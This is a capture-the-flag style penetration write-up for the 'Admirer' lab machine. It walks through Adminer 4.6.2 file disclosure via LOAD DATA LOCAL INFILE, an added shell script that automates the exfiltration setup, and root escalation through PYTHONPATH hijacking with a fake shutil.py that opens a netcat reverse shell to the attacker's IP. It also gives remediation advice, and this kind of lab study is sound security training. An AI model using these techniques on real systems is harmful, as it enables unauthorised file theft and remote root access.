Admirer (Easy)

Last updated 2 years ago

Lessons Learned

Penetration Report

Vulnerable Exploit: Adminer 4.6.2 File Disclosure Vulnerability

System Vulnerable: 10.10.10.187

Vulnerability Explanation: Adminer versions up to and including 4.6.2 let a user connect to any MySQL server and run the SQL statement LOAD DATA LOCAL INFILE. With the LOCAL keyword it is the MySQL client (the PHP process that serves Adminer) that opens the named file and uploads its contents to the server, not the server itself. An attacker who points Adminer at a MySQL server they control can therefore read any file the web server user can read, such as PHP source containing database credentials. The root cause is a design weakness in the MySQL protocol: the server tells the client which local file to send.

Privilege Escalation Vulnerability: A sudo rule lets user waldo run /opt/scripts/admin_tasks.sh as root while PYTHONPATH is passed through, so the shutil module imported by the root-run backup.py can be replaced with an attacker-controlled file (Python library hijacking).

Vulnerability Fix: Upgrade to the latest version of Adminer; the file disclosure was fixed in Adminer 4.6.3. For the privilege escalation, change the sudo rule so the user cannot set environment variables for the command, and have backup.py run with a fixed, root-owned module search path.

Severity: High

Steps to Compromise the Host:

Reconnaissance

nmap -sC -sV -p- -T4 10.10.10.187

Enumeration

Let's enumerate each service to see whether any of them runs a vulnerable version or is misconfigured.

Port 21 vsftpd 3.0.3

Anonymous login is not permitted, and vsftpd 3.0.3 has no useful public vulnerability, so we move on.

Port 80 Apache 2.4.25 (Debian)

The Nmap scan found the file robots.txt, which references the directory /admin-dir.

robots.txt hints that /admin-dir contains personal contacts and credentials, and mentions the username waldo. Requesting the directory itself is refused, so we cannot browse it.

Let's brute-force file and directory names under /admin-dir with gobuster to find anything we can access directly.

gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.187/admin-dir
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2021/10/27 10:43:25 Starting gobuster in directory enumeration mode
===============================================================
/contacts.txt         (Status: 200) [Size: 350]
/credentials.txt      (Status: 200) [Size: 136]
                                               
===============================================================
2021/10/27 11:07:47 Finished
===============================================================

Gobuster finds exactly what the hint promised: contacts.txt and credentials.txt.

Among these credentials, one set is valid for the FTP service. The FTP share contains two files, dump.sql and html.tar.gz.

dump.sql contains nothing of interest. Extract html.tar.gz, which contains the web root's folders and files.

# x = extract, z = decompress gzip, f = read from the named file, v = verbose
tar xzfv html.tar.gz

Going through each file and folder, we find credentials hard-coded in index.php and utility-scripts/db_admin.php.

The Nmap scan showed no open database port, so the database must be managed through a web front end somewhere. Browsing to the utility-scripts folder on the live site returns 403 Forbidden.

However, requesting info.php (a file we saw in the archive from FTP) directly does return the page, so the directory exists on the live server and only the listing is blocked.

Searching the machine's name reveals that Admirer is a play on Adminer, a single-file PHP database manager.

We then find the Adminer login page, adminer.php, which reports version 4.6.2.

Exploitation

First, configure MySQL on our Kali machine so that the target's Adminer can connect out to it. We create a database, a user with a password that may connect from a remote host, and a table to receive the file contents.

Create the database, user and password, granting access from the target's host.

Create a table in the database named Testing (the table is also called Testing below).

Change the server configuration from listening only on localhost to accepting connections from any host.

After changing the configuration, restart the MySQL service.

sudo service mysql restart

From the Adminer login page, connect to our Kali MySQL server (server field set to our IP, 10.10.14.31) with the credentials we created.

Run the exploit statement to read /var/www/html/index.php on the target. Because of the LOCAL keyword the file is opened by the target's PHP process and sent to our database, one line per row:

LOAD DATA LOCAL INFILE '/var/www/html/index.php' INTO TABLE Testing FIELDS TERMINATED BY "\n"

Adminer confirms that the query executed. Back on Kali, display the table Testing to read the file; it holds another set of credentials, again for the username waldo.

show databases;
use Testing;
show tables;
select * from Testing;
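The MySQL preparation and the exploit statement above, collected as one added shell example (not code from the original write-up). It assumes a MariaDB server on Kali at the usual config file path, the database and table name Testing from the write-up, and an assumed user exfil with a placeholder password; the table gets an auto-increment id so the file's lines come back in order, and ESCAPED BY '' stops MySQL from mangling backslashes in the PHP source:

```shell
# Added example, not from the original write-up. Prepares a MySQL/MariaDB
# server on the attacking host to receive files exfiltrated through Adminer's
# LOAD DATA LOCAL INFILE, and builds the statements to run from Adminer.
set -u

DB_NAME="Testing"                                         # from the write-up
DB_USER="exfil"                                           # assumed
DB_PASS="ChangeMe123!"                                    # assumed placeholder
MARIADB_CONF="/etc/mysql/mariadb.conf.d/50-server.cnf"    # assumed Kali path

# SQL that creates the receiving database, a user reachable from any host and
# a table with an ordering column. local_infile must be ON on the server or
# LOAD DATA LOCAL is refused (MariaDB defaults ON, MySQL 8 defaults OFF).
setup_sql() {
    cat <<EOF
CREATE DATABASE IF NOT EXISTS \`$DB_NAME\`;
CREATE USER IF NOT EXISTS '$DB_USER'@'%' IDENTIFIED BY '$DB_PASS';
GRANT ALL PRIVILEGES ON \`$DB_NAME\`.* TO '$DB_USER'@'%';
FLUSH PRIVILEGES;
USE \`$DB_NAME\`;
CREATE TABLE IF NOT EXISTS \`$DB_NAME\` (id INT AUTO_INCREMENT PRIMARY KEY, line TEXT);
SET GLOBAL local_infile = 1;
EOF
}

# Rewrite bind-address in the given config file so the server listens on all
# interfaces instead of only 127.0.0.1. Takes the file path as an argument so
# it can be tried on a copy first; set SUDO=sudo to edit the real file.
allow_remote_bind() {
    local conf="$1"
    ${SUDO:-} sed -i -E 's/^([[:space:]]*)bind-address[[:space:]]*=.*/\1bind-address = 0.0.0.0/' "$conf"
}

# The statement to paste into Adminer's SQL command box. The file is opened by
# the client (the target's PHP process), so the path is a path on the target.
read_file_sql() {
    cat <<EOF
LOAD DATA LOCAL INFILE '$1' INTO TABLE \`$DB_NAME\` FIELDS TERMINATED BY '\n' ESCAPED BY '' LINES TERMINATED BY '\n' (line);
EOF
}

# Back on the attacking host: print the received file in its original order.
dump_sql() {
    printf 'SELECT line FROM `%s` ORDER BY id;\n' "$DB_NAME"
}

# Usage on the attacking host:
#   setup_sql | sudo mysql
#   sudo cp "$MARIADB_CONF" "$MARIADB_CONF.bak" && SUDO=sudo allow_remote_bind "$MARIADB_CONF"
#   sudo systemctl restart mariadb
#   read_file_sql /var/www/html/index.php      # paste the output into Adminer
#   dump_sql | mysql -u "$DB_USER" -p"$DB_PASS" "$DB_NAME"
```

If Adminer reports "The used command is not allowed with this MySQL version", local_infile is off on the receiving server; if nothing arrives at all, check that the PHP side still permits local infile (the 4.6.3 fix and newer PHP defaults turn it off).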

The credentials from the text files did not work on SSH, but the ones recovered from index.php do. Log in over SSH as waldo and we have a shell on the machine.

Privilege Escalation

Run sudo -l to look for misconfigurations: waldo may run /opt/scripts/admin_tasks.sh with root privileges.

backup.py imports shutil and calls its make_archive function with three parameters (a, b, c).

admin_tasks.sh contains the backup_web() function, which is the interesting one: when the script runs as root it executes /opt/scripts/backup.py.

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

To exploit this misconfiguration, write a reverse-shell payload as a fake shutil module, saved as shutil.py, that exposes a make_archive function taking the same three arguments:

import os

# Replaces the real shutil module when its directory comes first on PYTHONPATH.
# backup.py calls shutil.make_archive(a, b, c); the arguments are ignored and a
# reverse shell is spawned instead (the target's nc must support -e).
def make_archive(a, b, c):
    os.system("nc -e /bin/bash 10.10.14.31 5555")

Start a netcat listener on port 5555:

nc -lvp 5555

Then set PYTHONPATH to /tmp, where we saved shutil.py, run /opt/scripts/admin_tasks.sh as root through sudo, and select option 6 (Backup Web Data). This only works because the sudo rule lets PYTHONPATH through (SETENV or env_keep); with sudo's default env_reset the variable would be dropped and the real shutil used.

Once admin_tasks.sh runs backup.py as root, its import of shutil resolves to our /tmp/shutil.py, make_archive is called, and the reverse shell connects back to our listener as root.

Reference Link

Adminer 4.6.2 file disclosure and the LOAD DATA LOCAL INFILE technique it relies on:

https://www.acunetix.com/vulnerabilities/web/adminer-4-6-2-file-disclosure-vulnerability/
https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f
https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html